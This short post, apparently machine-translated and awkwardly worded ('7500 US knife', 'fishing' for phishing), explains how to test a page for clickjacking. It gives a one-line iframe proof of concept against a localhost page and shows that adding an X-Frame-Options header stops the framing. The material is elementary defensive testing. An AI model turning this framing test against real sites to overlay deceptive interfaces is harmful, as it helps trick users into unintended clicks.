Today saw a google of clickjacking vulnerabilities to gain 7500 US knife, connected as follows
https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/
Clickjacking vulnerabilities, using the UI overlay, spoofing vulnerabilities visual for fishing.
Learn freebuff clickjacking can refer to the article "On the clickjacking attack"
https://www.freebuf.com/articles/web/67843.html
Clickjacking test method is very simple, the page inserted iframe tag, the display is able to successfully hijack success.
Such as: test hijacking page http://127.0.0.1/cj/index.html
Test poc
<html><iframe src="http://127.0.0.1/cj/index.html"></iframe></html>This time access test poc
This result appears to indicate the page is hijacked our success.
Now generally write scripts to automate testing time will be concerned about whether to return the response headers have X-FRAME-OPTIONS, because this is a better way to solve the click hijacking. Then there may be the response headers clickjacking does not exist
http://127.0.0.1/cj/index.html we add X-FRAME-OPTIONS try the test results
This not a hijack.